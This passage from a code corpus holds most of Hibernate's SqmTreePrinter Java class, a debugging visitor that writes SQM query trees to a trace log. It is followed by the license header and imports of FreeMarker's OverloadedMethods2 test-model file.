org.hibernate.query.sqm.tree.predicate.SqmExistsPredicate; import org.hibernate.query.sqm.tree.predicate.SqmGroupedPredicate; import org.hibernate.query.sqm.tree.predicate.SqmInListPredicate; import org.hibernate.query.sqm.tree.predicate.SqmInSubQueryPredicate; import org.hibernate.query.sqm.tree.predicate.SqmJunctionPredicate; import org.hibernate.query.sqm.tree.predicate.SqmLikePredicate; import 
org.hibernate.query.sqm.tree.predicate.SqmMemberOfPredicate; import org.hibernate.query.sqm.tree.predicate.SqmNegatedPredicate; import org.hibernate.query.sqm.tree.predicate.SqmNullnessPredicate; import org.hibernate.query.sqm.tree.predicate.SqmPredicate; import org.hibernate.query.sqm.tree.predicate.SqmTruthnessPredicate; import org.hibernate.query.sqm.tree.predicate.SqmWhereClause; import org.hibernate.query.sqm.tree.select.SqmDynamicInstantiation; import org.hibernate.query.sqm.tree.select.SqmJpaCompoundSelection; import org.hibernate.query.sqm.tree.select.SqmOrderByClause; import org.hibernate.query.sqm.tree.select.SqmQueryGroup; import org.hibernate.query.sqm.tree.select.SqmQueryPart; import org.hibernate.query.sqm.tree.select.SqmQuerySpec; import org.hibernate.query.sqm.tree.select.SqmSelectClause; import org.hibernate.query.sqm.tree.select.SqmSelectStatement; import org.hibernate.query.sqm.tree.select.SqmSelectableNode; import org.hibernate.query.sqm.tree.select.SqmSelection; import org.hibernate.query.sqm.tree.select.SqmSortSpecification; import org.hibernate.query.sqm.tree.select.SqmSubQuery; import org.hibernate.query.sqm.tree.update.SqmAssignment; import org.hibernate.query.sqm.tree.update.SqmSetClause; import org.hibernate.query.sqm.tree.update.SqmUpdateStatement; import org.jboss.logging.Logger; import jakarta.persistence.criteria.Predicate; /** * Printer for an SQM tree - for debugging purpose * * @implNote At the top-level (statement) we check against {@link #TRACE_ENABLED} * and decide whether to continue or not. That's to avoid unnecessary, continued * checking of that boolean. 
The assumption being that we only ever enter from * these statement rules * * @author Steve Ebersole */ public class SqmTreePrinter implements SemanticQueryWalker<Object> { private static final Logger LOG = Logger.getLogger( SqmTreePrinter.class ); private static final Logger LOGGER = QueryLogging.subLogger( "sqm.ast" ); private static final boolean TRACE_ENABLED = LOGGER.isTraceEnabled(); public static void logTree(SqmQuerySpec<?> sqmQuerySpec, String header) { if ( !TRACE_ENABLED ) { return; } final SqmTreePrinter treePrinter = new SqmTreePrinter(); treePrinter.visitQuerySpec( sqmQuerySpec ); final String title = header != null ? header : "SqmQuerySpec Tree"; LOGGER.tracef( "%s:%n%s", title, treePrinter.buffer.toString() ); } public static void logTree(SqmStatement<?> sqmStatement) { if ( !TRACE_ENABLED ) { return; } final SqmTreePrinter printer = new SqmTreePrinter(); if ( sqmStatement instanceof SqmSelectStatement<?> statement ) { printer.visitSelectStatement( statement ); } else if ( sqmStatement instanceof SqmDeleteStatement<?> statement ) { printer.visitDeleteStatement( statement ); } else if ( sqmStatement instanceof SqmUpdateStatement<?> statement ) { printer.visitUpdateStatement( statement ); } else if ( sqmStatement instanceof SqmInsertSelectStatement<?> statement ) { printer.visitInsertSelectStatement( statement ); } LOGGER.tracef( "SqmStatement Tree:%n%s", printer.buffer.toString() ); } private final StringBuffer buffer = new StringBuffer(); private int depth = 2; private void processStanza(String name, Runnable continuation) { processStanza( name, false, continuation ); } private void processStanza(String name, String description, Runnable continuation) { processStanza( name, description, false, continuation ); } private void processStanza(String name, boolean indentContinuation, Runnable continuation) { logWithIndentation( "-> [%s]", name ); depth++; try { if ( indentContinuation ) { depth++; } continuation.run(); } catch (Exception e) { LOG.debugf( 
e, "Error processing stanza {%s}", name ); } finally { if ( indentContinuation ) { depth--; } } depth--; logWithIndentation( "<- [%s]", name ); } private void processStanza( String name, String description, boolean indentContinuation, Runnable continuation) { final String stanzaLabel = description == null ? "[" + name + ']' : "[" + name + "] - " + description; logWithIndentation( "-> " + stanzaLabel ); depth++; try { if ( indentContinuation ) { depth++; } continuation.run(); } catch (Exception e) { LOG.debugf( e, "Error processing stanza {%s}", name ); } finally { if ( indentContinuation ) { depth--; } } depth--; logWithIndentation( "<- " + stanzaLabel ); } private void logWithIndentation(Object line) { pad( depth ); buffer.append( line ).append( System.lineSeparator() ); } private void pad(int depth) { for ( int i = 0; i < depth; i++ ) { buffer.append( " " ); } } private void logWithIndentation(String pattern, Object arg1) { logWithIndentation( String.format( pattern, arg1 ) ); } private void logWithIndentation(String pattern, Object arg1, Object arg2) { logWithIndentation( String.format( pattern, arg1, arg2 ) ); } private void logWithIndentation(String pattern, Object... args) { logWithIndentation( String.format( pattern, args ) ); } private void logIndented(String line) { depth++; logWithIndentation( line ); depth--; } private void logIndented(String pattern, Object arg) { depth++; logWithIndentation( String.format( Locale.ROOT, pattern, arg ) ); depth--; } private void logIndented(String pattern, Object arg1, Object arg2) { depth++; logWithIndentation( String.format( Locale.ROOT, pattern, arg1, arg2 ) ); depth--; } private void logIndented(String pattern, Object... 
// NOTE(review): continuation of the varargs logIndented overload started above this line.
args) {
        depth++;
        logWithIndentation( String.format( Locale.ROOT, pattern, args ) );
        depth--;
    }

    // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    // statements

    /**
     * Prints a "delete" stanza: the target entity path followed by the where clause.
     * All statement-level visitors below short-circuit when trace logging is disabled.
     */
    @Override
    public Object visitDeleteStatement(SqmDeleteStatement<?> statement) {
        if ( TRACE_ENABLED ) {
            processStanza(
                    "delete",
                    () -> {
                        logWithIndentation( "[target = %s]", statement.getTarget().getNavigablePath() );
                        visitWhereClause( statement.getWhereClause() );
                    }
            );
        }
        return null;
    }

    /**
     * Prints an "insert ... select" stanza: target, insertion target paths ("into"),
     * then the source query part.
     */
    @Override
    public Object visitInsertSelectStatement(SqmInsertSelectStatement<?> statement) {
        if ( TRACE_ENABLED ) {
            processStanza(
                    "insert",
                    () -> {
                        logWithIndentation( "[target = %s]", statement.getTarget().getNavigablePath() );
                        processStanza(
                                "into",
                                () -> statement.getInsertionTargetPaths().forEach( sqmPath -> sqmPath.accept( this ) )
                        );
                        statement.getSelectQueryPart().accept( this );
                    }
            );
        }
        return null;
    }

    /**
     * Prints an "insert ... values" stanza: target, insertion target paths, and the
     * optional "on conflict" clause. NOTE(review): the VALUES themselves are not printed here.
     */
    @Override
    public Object visitInsertValuesStatement(SqmInsertValuesStatement<?> statement) {
        if ( TRACE_ENABLED ) {
            processStanza(
                    "insert",
                    () -> {
                        logWithIndentation( "[target = %s]", statement.getTarget().getNavigablePath() );
                        processStanza(
                                "into",
                                () -> statement.getInsertionTargetPaths().forEach( sqmPath -> sqmPath.accept( this ) )
                        );
                        if ( statement.getConflictClause() != null ) {
                            processStanza(
                                    "on conflict",
                                    () -> statement.getConflictClause().accept( this )
                            );
                        }
                    }
            );
        }
        return null;
    }

    /**
     * Prints a conflict clause: either the named constraint or its attribute paths,
     * then "do nothing" or the "do update" set/where parts.
     * NOTE(review): unlike the statement visitors, this one is not guarded by TRACE_ENABLED —
     * it is only reached via visitInsertValuesStatement, which already checks the flag.
     */
    @Override
    public Object visitConflictClause(SqmConflictClause<?> sqmConflictClause) {
        if ( sqmConflictClause.getConstraintName() != null ) {
            logWithIndentation( "[constraintName = %s]", sqmConflictClause.getConstraintName() );
        }
        else {
            processStanza(
                    "constraint attributes",
                    () -> sqmConflictClause.getConstraintPaths().forEach( sqmPath -> sqmPath.accept( this ) )
            );
        }
        final SqmConflictUpdateAction<?> updateAction = sqmConflictClause.getConflictAction();
        if ( updateAction == null ) {
            logWithIndentation( "do nothing" );
        }
        else {
            logWithIndentation( "do update " );
            visitSetClause( updateAction.getSetClause() );
            visitWhereClause( updateAction.getWhereClause() );
        }
        return null;
    }

    /** Prints a "select" stanza by delegating to the statement's query part. */
    @Override
    public Object visitSelectStatement(SqmSelectStatement<?> statement) {
        if ( TRACE_ENABLED ) {
            processStanza(
                    "select",
                    () -> statement.getQueryPart().accept( this )
            );
        }
        return null;
    }

    // NOTE(review): CTE statements are only marked with a bare "cte" line; their content
    // is not walked here.
    @Override
    public Object visitCteStatement(SqmCteStatement<?> sqmCteStatement) {
        if ( TRACE_ENABLED ) {
            logIndented( "cte" );
        }
        return null;
    }

    // Intentionally a no-op: CTE containers are not rendered.
    @Override
    public Object visitCteContainer(SqmCteContainer consumer) {
        return null;
    }

    /** Prints an "update" (or "update versioned") stanza: target, set clause, where clause. */
    @Override
    public Object visitUpdateStatement(SqmUpdateStatement<?> statement) {
        if ( TRACE_ENABLED ) {
            processStanza(
                    statement.isVersioned() ? "update versioned" : "update",
                    () -> {
                        logWithIndentation( "[target = %s]", statement.getTarget().getNavigablePath() );
                        visitSetClause( statement.getSetClause() );
                        visitWhereClause( statement.getWhereClause() );
                    }
            );
        }
        return null;
    }

    /** Prints a "set" stanza containing one "assignment" stanza per assignment. */
    @Override
    public Object visitSetClause(SqmSetClause setClause) {
        processStanza(
                "set",
                () -> setClause.getAssignments().forEach( this::visitAssignment )
        );
        return null;
    }

    /** Prints one assignment as "=" with the target path and assigned value indented under it. */
    @Override
    public Object visitAssignment(SqmAssignment<?> assignment) {
        processStanza(
                "assignment",
                () -> {
                    logWithIndentation( "=" );
                    depth++;
                    logWithIndentation( "[%s]", assignment.getTargetPath().getNavigablePath() );
                    assignment.getValue().accept( this );
                    depth--;
                }
        );
        return null;
    }

    // ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    // query-spec

    /** Prints a "query-group" stanza, dispatching each part to spec/group as appropriate. */
    @Override
    public Object visitQueryGroup(SqmQueryGroup<?> queryGroup) {
        processStanza(
                "query-group",
                () -> {
                    for ( SqmQueryPart<?> queryPart : queryGroup.getQueryParts() ) {
                        if ( queryPart instanceof SqmQuerySpec<?> ) {
                            visitQuerySpec( (SqmQuerySpec<?>) queryPart );
                        }
                        else {
                            visitQueryGroup( (SqmQueryGroup<?>) queryPart );
                        }
                    }
                }
        );
        return null;
    }

    /**
     * Prints a "query-spec" stanza: select, from, where, group-by, having, order-by,
     * offset, fetch. NOTE(review): continues past the chunk boundary below.
     */
    @Override
    public Object visitQuerySpec(SqmQuerySpec<?> querySpec) {
        processStanza(
                "query-spec",
                () -> {
                    visitSelectClause( querySpec.getSelectClause() );
                    visitFromClause( querySpec.getFromClause() );
                    visitWhereClause(
// NOTE(review): continuation of visitQuerySpec, whose opening lies above this chunk boundary.
querySpec.getWhereClause() );
                    visitGroupByClause( querySpec.getGroupByClauseExpressions() );
                    visitHavingClause( querySpec.getHavingClausePredicate() );
                    visitOrderByClause( querySpec.getOrderByClause() );
                    visitOffsetExpression( querySpec.getOffsetExpression() );
                    visitFetchExpression( querySpec.getFetchExpression() );
                }
        );
        return null;
    }

    /** Prints a "group-by" stanza; skipped entirely when there are no grouping expressions. */
    @Override
    public Object visitGroupByClause(List<SqmExpression<?>> groupByClauseExpressions) {
        if ( groupByClauseExpressions != null && !groupByClauseExpressions.isEmpty() ) {
            processStanza(
                    "group-by",
                    () -> groupByClauseExpressions.forEach( e -> e.accept( this ) )
            );
        }
        return null;
    }

    /** Prints a "having" stanza; skipped when there is no having predicate. */
    @Override
    public Object visitHavingClause(SqmPredicate predicate) {
        if ( predicate != null ) {
            processStanza(
                    "having",
                    () -> predicate.accept( this )
            );
        }
        return null;
    }

    /** Prints a "JpaCompoundSelection" stanza with each selection item nested under it. */
    @Override
    public Object visitJpaCompoundSelection(SqmJpaCompoundSelection<?> selection) {
        processStanza(
                "JpaCompoundSelection",
                () -> {
                    for ( SqmSelectableNode<?> selectionItem : selection.getSelectionItems() ) {
                        selectionItem.accept( this );
                    }
                }
        );
        return null;
    }

    /** Prints a "from" stanza containing one "root" stanza per query root. */
    @Override
    public Object visitFromClause(SqmFromClause fromClause) {
        processStanza(
                "from",
                () -> fromClause.visitRoots( this::visitRootPath )
        );
        return null;
    }

    /** Prints a "root" stanza labelled with the root's navigable path, then its joins. */
    @Override
    public Object visitRootPath(SqmRoot<?> sqmRoot) {
        processStanza(
                "root", "'" + sqmRoot.getNavigablePath() + "'",
                () -> processJoins( sqmRoot )
        );
        return null;
    }

    @Override
    public Object visitRootDerived(SqmDerivedRoot<?> sqmRoot) {
        processStanza(
                "derived", "'" + sqmRoot.getNavigablePath() + "'",
                () -> processJoins( sqmRoot )
        );
        return null;
    }

    // NOTE(review): function roots are also labelled "derived" (same label as visitRootDerived) —
    // presumably intentional upstream; confirm before "fixing" the label.
    @Override
    public Object visitRootFunction(SqmFunctionRoot<?> sqmRoot) {
        processStanza(
                "derived", "'" + sqmRoot.getNavigablePath() + "'",
                () -> processJoins( sqmRoot )
        );
        return null;
    }

    @Override
    public Object visitRootCte(SqmCteRoot<?> sqmRoot) {
        processStanza(
                "cte", "'" + sqmRoot.getNavigablePath() + "'",
                () -> processJoins( sqmRoot )
        );
        return null;
    }

    // Prints a "joins" stanza for a from-element; no output at all when it has no joins.
    private void processJoins(SqmFrom<?,?> sqmFrom) {
        if ( !sqmFrom.hasJoins() ) {
            return;
        }
        processStanza(
                "joins",
                () -> sqmFrom.visitSqmJoins( sqmJoin -> sqmJoin.accept( this ) )
        );
    }

    @Override
    public Object visitCrossJoin(SqmCrossJoin<?> joinedFromElement) {
        processStanza(
                "cross", "'" + joinedFromElement.getNavigablePath() + "'",
                () -> processJoins( joinedFromElement )
        );
        return null;
    }

    @Override
    public Object visitPluralPartJoin(SqmPluralPartJoin<?, ?> joinedFromElement) {
        processStanza(
                "plural-part", "'" + joinedFromElement.getNavigablePath() + "'",
                () -> processJoins( joinedFromElement )
        );
        return null;
    }

    // True while printing a join's ON predicate, so from-elements referenced inside the
    // predicate are rendered as simple "[joined-path]" lines instead of full join stanzas.
    private boolean inJoinPredicate;

    // Prints an "on" stanza for the join predicate, if any; saves and restores the flag so
    // nested predicates unwind correctly.
    private void processJoinPredicate(SqmJoin<?, ?> joinedFromElement) {
        if ( joinedFromElement.getJoinPredicate() != null ) {
            boolean oldInJoinPredicate = inJoinPredicate;
            inJoinPredicate = true;
            processStanza(
                    "on",
                    () -> joinedFromElement.getJoinPredicate().accept( this )
            );
            inJoinPredicate = oldInJoinPredicate;
        }
    }

    @Override
    public Object visitQualifiedEntityJoin(SqmEntityJoin<?,?> joinedFromElement) {
        if ( inJoinPredicate ) {
            logWithIndentation( "-> [joined-path] - '%s'", joinedFromElement.getNavigablePath() );
        }
        else {
            processStanza(
                    "entity", "'" + joinedFromElement.getNavigablePath() + "'",
                    () -> {
                        processJoinPredicate( joinedFromElement );
                        processJoins( joinedFromElement );
                    }
            );
        }
        return null;
    }

    // Attribute joins additionally record whether the association is fetched.
    @Override
    public Object visitQualifiedAttributeJoin(SqmAttributeJoin<?,?> joinedFromElement) {
        if ( inJoinPredicate ) {
            logWithIndentation( "-> [joined-path] - '%s'", joinedFromElement.getNavigablePath() );
        }
        else {
            processStanza(
                    "attribute", "'" + joinedFromElement.getNavigablePath() + "'",
                    () -> {
                        logIndented( "[fetched = " + joinedFromElement.isFetched() + ']' );
                        processJoinPredicate( joinedFromElement );
                        processJoins( joinedFromElement );
                    }
            );
        }
        return null;
    }

    // NOTE(review): cut off at the chunk boundary — the else-branch continues below.
    @Override
    public Object visitQualifiedDerivedJoin(SqmDerivedJoin<?> joinedFromElement) {
        if ( inJoinPredicate ) {
            logWithIndentation( "-> [joined-path] - '%s'", joinedFromElement.getNavigablePath() );
        }
        else {
// NOTE(review): continuation of visitQualifiedDerivedJoin's else-branch from above the chunk boundary.
processStanza(
                    "derived", "'" + joinedFromElement.getNavigablePath() + "'",
                    () -> {
                        processJoinPredicate( joinedFromElement );
                        processJoins( joinedFromElement );
                    }
            );
        }
        return null;
    }

    // NOTE(review): function joins print the "derived" label too — same as derived joins;
    // presumably intentional upstream, confirm before changing.
    @Override
    public Object visitQualifiedFunctionJoin(SqmFunctionJoin<?> joinedFromElement) {
        if ( inJoinPredicate ) {
            logWithIndentation( "-> [joined-path] - '%s'", joinedFromElement.getNavigablePath() );
        }
        else {
            processStanza(
                    "derived", "'" + joinedFromElement.getNavigablePath() + "'",
                    () -> {
                        processJoinPredicate( joinedFromElement );
                        processJoins( joinedFromElement );
                    }
            );
        }
        return null;
    }

    @Override
    public Object visitQualifiedCteJoin(SqmCteJoin<?> joinedFromElement) {
        if ( inJoinPredicate ) {
            logWithIndentation( "-> [joined-path] - '%s'", joinedFromElement.getNavigablePath() );
        }
        else {
            processStanza(
                    "cte", "'" + joinedFromElement.getNavigablePath() + "'",
                    () -> {
                        processJoinPredicate( joinedFromElement );
                        processJoins( joinedFromElement );
                    }
            );
        }
        return null;
    }

    // ~~~~ path visitors: each prints a single tagged line with the navigable path.

    @Override
    public Object visitBasicValuedPath(SqmBasicValuedSimplePath<?> path) {
        logWithIndentation( "-> [basic-path] - '%s'", path.getNavigablePath() );
        return null;
    }

    @Override
    public Object visitEmbeddableValuedPath(SqmEmbeddedValuedSimplePath<?> path) {
        logWithIndentation( "-> [embedded-path] - '%s'", path.getNavigablePath() );
        return null;
    }

    @Override
    public Object visitAnyValuedValuedPath(SqmAnyValuedSimplePath<?> path) {
        logWithIndentation( "-> [any-path] - '%s'", path.getNavigablePath() );
        return null;
    }

    @Override
    public Object visitNonAggregatedCompositeValuedPath(NonAggregatedCompositeSimplePath<?> path) {
        logWithIndentation( "-> [non-aggregated-composite-path] - '%s'", path.getNavigablePath() );
        return null;
    }

    // FK references are labelled with the path of their left-hand side.
    @Override
    public Object visitFkExpression(SqmFkExpression<?> fkExpression) {
        logWithIndentation( "-> [fk-ref] - '%s'", fkExpression.getLhs().getNavigablePath() );
        return null;
    }

    @Override
    public Object visitDiscriminatorPath(DiscriminatorSqmPath<?> sqmPath) {
        logWithIndentation( "-> [discriminator-path] - '%s'", sqmPath.getNavigablePath() );
        return null;
    }

    @Override
    public Object visitEntityValuedPath(SqmEntityValuedSimplePath<?> path) {
        logWithIndentation( "-> [entity-path] - '%s'", path.getNavigablePath() );
        return null;
    }

    @Override
    public Object visitPluralValuedPath(SqmPluralValuedSimplePath<?> path) {
        logWithIndentation( "-> [plural-path] - '%s'", path.getNavigablePath() );
        return null;
    }

    // Intentionally not rendered.
    @Override
    public Object visitIndexedPluralAccessPath(SqmIndexedCollectionAccessPath<?> path) {
        return null;
    }

    // Intentionally not rendered.
    @Override
    public Object visitTreatedPath(SqmTreatedPath<?,?> sqmTreatedPath) {
        return null;
    }

    // Intentionally not rendered.
    @Override
    public Object visitCorrelation(SqmCorrelation<?, ?> correlation) {
        return null;
    }

    /** Prints "select" (or "select(distinct)") with one nested stanza per selection. */
    @Override
    public Object visitSelectClause(SqmSelectClause selectClause) {
        processStanza(
                selectClause.isDistinct() ? "select(distinct)" : "select",
                () -> selectClause.getSelections().forEach( this::visitSelection )
        );
        return null;
    }

    // NOTE(review): cut off at the chunk boundary — the ternary's branches continue below.
    @Override
    public Object visitSelection(SqmSelection<?> selection) {
        processStanza(
                selection.getAlias() == null ?
// NOTE(review): continuation of visitSelection from above the chunk boundary — the stanza
// label is "selection" or "selection(alias)" depending on whether the selection has an alias.
"selection" : "selection(" + selection.getAlias() + ")",
                () -> selection.getSelectableNode().accept( this )
        );
        return null;
    }

    // Intentionally not rendered.
    @Override
    public Object visitValues(SqmValues values) {
        return null;
    }

    // Positional parameters are printed in JDBC-style "?N" form.
    @Override
    public Object visitPositionalParameterExpression(SqmPositionalParameter<?> expression) {
        logWithIndentation( "?%s", expression.getPosition() );
        return null;
    }

    // Named parameters are printed in HQL-style ":name" form.
    @Override
    public Object visitNamedParameterExpression(SqmNamedParameter<?> expression) {
        logWithIndentation( ":%s", expression.getName() );
        return null;
    }

    // ~~~~ the visitors below are intentional no-ops: these node kinds are not rendered
    // by this printer (they only exist to satisfy the walker interface).

    @Override
    public Object visitJpaCriteriaParameter(JpaCriteriaParameter<?> expression) {
        return null;
    }

    @Override
    public Object visitEntityTypeLiteralExpression(SqmLiteralEntityType<?> expression) {
        return null;
    }

    @Override
    public Object visitEmbeddableTypeLiteralExpression(SqmLiteralEmbeddableType<?> expression) {
        return null;
    }

    @Override
    public Object visitParameterizedEntityTypeExpression(SqmParameterizedEntityType<?> expression) {
        return null;
    }

    @Override
    public Object visitUnaryOperationExpression(SqmUnaryOperation<?> expression) {
        return null;
    }

    @Override
    public Object visitFunction(SqmFunction<?> tSqmFunction) {
        return null;
    }

    @Override
    public Object visitSetReturningFunction(SqmSetReturningFunction<?> tSqmFunction) {
        return null;
    }

    @Override
    public Object visitCoalesce(SqmCoalesce<?> sqmCoalesce) {
        return null;
    }

    @Override
    public Object visitToDuration(SqmToDuration<?> toDuration) {
        return null;
    }

    @Override
    public Object visitByUnit(SqmByUnit sqmByUnit) {
        return null;
    }

    @Override
    public Object visitExtractUnit(SqmExtractUnit<?> extractUnit) {
        return null;
    }

    @Override
    public Object visitFormat(SqmFormat sqmFormat) {
        return null;
    }

    @Override
    public Object visitCastTarget(SqmCastTarget<?> sqmCastTarget) {
        return null;
    }

    @Override
    public Object visitTrimSpecification(SqmTrimSpecification trimSpecification) {
        return null;
    }

    @Override
    public Object visitDistinct(SqmDistinct<?> distinct) {
        return null;
    }

    @Override
    public Object visitOverflow(SqmOverflow<?> sqmOverflow) {
        return null;
    }

    @Override
    public Object visitDurationUnit(SqmDurationUnit<?> durationUnit) {
        return null;
    }

    @Override
    public Object visitStar(SqmStar sqmStar) {
        return null;
    }

    @Override
    public Object visitOver(SqmOver<?> over) {
        return null;
    }

    @Override
    public Object visitWindow(SqmWindow window) {
        return null;
    }

    /** Prints a "where" stanza; skipped when the clause or its predicate is absent. */
    @Override
    public Object visitWhereClause(SqmWhereClause whereClause) {
        if ( whereClause != null && whereClause.getPredicate() != null ) {
            processStanza(
                    "where",
                    () -> whereClause.getPredicate().accept( this )
            );
        }
        return null;
    }

    /** Prints a "grouped" stanza with the sub-predicate one level deeper. */
    @Override
    public Object visitGroupedPredicate(SqmGroupedPredicate predicate) {
        processStanza(
                "grouped",
                () -> {
                    depth++;
                    predicate.getSubPredicate().accept( this );
                    depth--;
                }
        );
        return null;
    }

    /** Prints an "and"/"or" stanza with each sub-predicate nested under it. */
    @Override
    public Object visitJunctionPredicate(SqmJunctionPredicate predicate) {
        processStanza(
                predicate.getOperator() == Predicate.BooleanOperator.AND ? "and" : "or",
                () -> {
                    for ( SqmPredicate subPredicate : predicate.getPredicates() ) {
                        subPredicate.accept( this );
                    }
                }
        );
        return null;
    }

    /**
     * Prints the comparison operator name (negated form when the predicate is negated)
     * with both operands indented under it; the finally block keeps the depth balanced
     * even if an operand visitor throws.
     */
    @Override
    public Object visitComparisonPredicate(SqmComparisonPredicate predicate) {
        processStanza(
                predicate.isNegated() ? predicate.getSqmOperator().negated().name() : predicate.getSqmOperator().name(),
                () -> {
                    depth++;
                    try {
                        predicate.getLeftHandExpression().accept( this );
                        predicate.getRightHandExpression().accept( this );
                    }
                    finally {
                        depth--;
                    }
                }
        );
        return null;
    }

    @Override
    public Object visitIsEmptyPredicate(SqmEmptinessPredicate predicate) {
        processStanza(
                predicate.isNegated() ? "is-not-empty" : "is-empty",
                () -> {
                    depth++;
                    predicate.getPluralPath().accept( this );
                    depth--;
                }
        );
        return null;
    }

    // NOTE(review): cut off at the chunk boundary — the ternary's branches continue below.
    @Override
    public Object visitIsNullPredicate(SqmNullnessPredicate predicate) {
        processStanza(
                predicate.isNegated() ?
// NOTE(review): continuation of visitIsNullPredicate from above the chunk boundary; this uses
// the processStanza(name, indentContinuation, continuation) overload with extra indentation.
"is-not-null" : "is-null",
                true,
                () -> predicate.getExpression().accept( this )
        );
        return null;
    }

    // Prints "is-true"/"is-false" (or the negated forms) based on the predicate's boolean value.
    @Override
    public Object visitIsTruePredicate(SqmTruthnessPredicate predicate) {
        processStanza(
                (predicate.isNegated() ? "is-not-" : "is-") + predicate.getBooleanValue(),
                true,
                () -> predicate.getExpression().accept( this )
        );
        return null;
    }

    /** Prints the tested expression followed by the lower and upper bounds. */
    @Override
    public Object visitBetweenPredicate(SqmBetweenPredicate predicate) {
        processStanza(
                predicate.isNegated() ? "is-not-between" : "is-between",
                () -> {
                    predicate.getExpression().accept( this );
                    predicate.getLowerBound().accept( this );
                    predicate.getUpperBound().accept( this );
                }
        );
        return null;
    }

    /**
     * Prints an "is-[not-](i)like" stanza: pattern, match expression, then the optional
     * escape character. NOTE(review): the pattern is visited before the match expression —
     * presumably intentional upstream ordering; confirm before reordering.
     */
    @Override
    public Object visitLikePredicate(SqmLikePredicate predicate) {
        final String likeType = predicate.isCaseSensitive() ? "like" : "ilike";
        processStanza(
                ( predicate.isNegated() ? "is-not-" : "is-" ) + likeType,
                () -> {
                    predicate.getPattern().accept( this );
                    predicate.getMatchExpression().accept( this );
                    if ( predicate.getEscapeCharacter() != null ) {
                        predicate.getEscapeCharacter().accept( this );
                    }
                }
        );
        return null;
    }

    // ~~~~ intentional no-ops: these predicate/clause/expression kinds are not rendered.

    @Override
    public Object visitMemberOfPredicate(SqmMemberOfPredicate predicate) {
        return null;
    }

    @Override
    public Object visitNegatedPredicate(SqmNegatedPredicate predicate) {
        return null;
    }

    @Override
    public Object visitInListPredicate(SqmInListPredicate<?> predicate) {
        return null;
    }

    @Override
    public Object visitInSubQueryPredicate(SqmInSubQueryPredicate<?> predicate) {
        return null;
    }

    @Override
    public Object visitBooleanExpressionPredicate(SqmBooleanExpressionPredicate predicate) {
        return null;
    }

    @Override
    public Object visitExistsPredicate(SqmExistsPredicate sqmExistsPredicate) {
        return null;
    }

    @Override
    public Object visitOrderByClause(SqmOrderByClause orderByClause) {
        return null;
    }

    @Override
    public Object visitSortSpecification(SqmSortSpecification sortSpecification) {
        return null;
    }

    @Override
    public Object visitOffsetExpression(SqmExpression<?> expression) {
        return null;
    }

    @Override
    public Object visitFetchExpression(SqmExpression<?> expression) {
        return null;
    }

    @Override
    public Object visitPluralAttributeSizeFunction(SqmCollectionSize function) {
        return null;
    }

    @Override
    public Object visitMapEntryFunction(SqmMapEntryReference<?, ?> function) {
        return null;
    }

    @Override
    public Object visitElementAggregateFunction(SqmElementAggregateFunction<?> binding) {
        return null;
    }

    @Override
    public Object visitIndexAggregateFunction(SqmIndexAggregateFunction<?> path) {
        return null;
    }

    @Override
    public Object visitFunctionPath(SqmFunctionPath<?> functionPath) {
        return null;
    }

    @Override
    public Object visitLiteral(SqmLiteral<?> literal) {
        return null;
    }

    @Override
    public Object visitTuple(SqmTuple<?> sqmTuple) {
        return null;
    }

    @Override
    public Object visitCollation(SqmCollation sqmCollate) {
        return null;
    }

    @Override
    public Object visitBinaryArithmeticExpression(SqmBinaryArithmetic<?> expression) {
        return null;
    }

    @Override
    public Object visitSubQueryExpression(SqmSubQuery<?> expression) {
        return null;
    }

    @Override
    public Object visitSimpleCaseExpression(SqmCaseSimple<?,?> expression) {
        return null;
    }

    @Override
    public Object visitSearchedCaseExpression(SqmCaseSearched<?> expression) {
        return null;
    }

    @Override
    public Object visitAny(SqmAny<?> sqmAny) {
        return null;
    }

    @Override
    public Object visitEvery(SqmEvery<?> sqmEvery) {
        return null;
    }

    @Override
    public Object visitSummarization(SqmSummarization<?> sqmSummarization) {
        return null;
    }

    @Override
    public Object visitAnyDiscriminatorTypeExpression(AnyDiscriminatorSqmPath<?> expression) {
        return null;
    }

    @Override
    public Object visitAnyDiscriminatorTypeValueExpression(SqmAnyDiscriminatorValue<?> expression) {
        return null;
    }

    /**
     * Prints a "dynamic-instantiation (targetType)" stanza containing an "arguments" stanza
     * with one "argument (alias)" stanza per constructor argument, each argument's selectable
     * node printed one level deeper.
     */
    @Override
    public Object visitDynamicInstantiation(SqmDynamicInstantiation<?> sqmDynamicInstantiation) {
        processStanza(
                "dynamic-instantiation (" + sqmDynamicInstantiation.getInstantiationTarget().getJavaType() + ')',
                () -> processStanza(
                        "arguments",
                        () -> sqmDynamicInstantiation.getArguments().forEach(
                                argument -> processStanza(
                                        "argument (" + argument.getAlias() + ')',
                                        () -> {
                                            depth++;
                                            argument.getSelectableNode().accept( this );
                                            depth--;
                                        }
                                )
                        )
                )
        );
        return null;
    }

    @Override
    public Object visitEnumLiteral(SqmEnumLiteral<?> sqmEnumLiteral) {
        return null;
    }

    @Override
    public Object visitFieldLiteral(SqmFieldLiteral<?> sqmFieldLiteral) {
        return null;
    }

    @Override
    public <N extends Number> Object visitHqlNumericLiteral(SqmHqlNumericLiteral<N> numericLiteral) {
        return null;
    }

    @Override
    public Object visitFullyQualifiedClass(Class<?> namedClass) {
        return null;
    }

    @Override
    public Object visitAsWrapperExpression(AsWrapperSqmExpression<?> expression) {
        return null;
    }

    @Override
    public Object visitNamedExpression(SqmNamedExpression<?> expression) {
        return null;
    }

    @Override
    public Object visitModifiedSubQueryExpression(SqmModifiedSubQueryExpression<?> expression) {
        return null;
    }
}
apache/freemarker
34,963
freemarker-test-utils/src/main/java/freemarker/test/templatesuite/models/OverloadedMethods2.java
/*
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements. See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership. The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License. You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied. See the License for the
 * specific language governing permissions and limitations
 * under the License.
 */

package freemarker.test.templatesuite.models;

import java.io.File;
import java.io.Serializable;
import java.math.BigDecimal;
import java.math.BigInteger;
import java.util.ArrayList;
import java.util.Date;
import java.util.List;
